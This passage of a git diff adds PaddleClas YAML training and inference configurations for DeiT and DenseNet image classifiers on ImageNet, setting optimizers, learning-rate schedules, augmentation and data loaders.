0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 
0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_224.yaml new file mode 100644 index 0000000..8f4207e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: 
./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_384.yaml new file mode 100644 index 0000000..00afe54 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_384.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + 
sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_distilled_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_distilled_patch16_224.yaml new file mode 100644 index 0000000..c27bed4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_distilled_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: 
DeiT_small_distilled_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + 
use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_patch16_224.yaml new file mode 100644 index 0000000..f53b8ec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_small_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - 
RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_distilled_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_distilled_patch16_224.yaml new file mode 100644 
index 0000000..8b9e00f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_distilled_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_tiny_distilled_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + 
name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_patch16_224.yaml new file mode 100644 index 0000000..242093d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_tiny_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 
+ beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - 
CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet121.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet121.yaml new file mode 100644 index 0000000..5100658 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet121.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet121 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: 
./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet161.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet161.yaml new file mode 100644 index 0000000..2834903 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet161.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet161 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + 
regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet169.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet169.yaml new file mode 100644 index 0000000..09fde34 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet169.yaml @@ -0,0 +1,130 @@ +# global 
configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet169 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + 
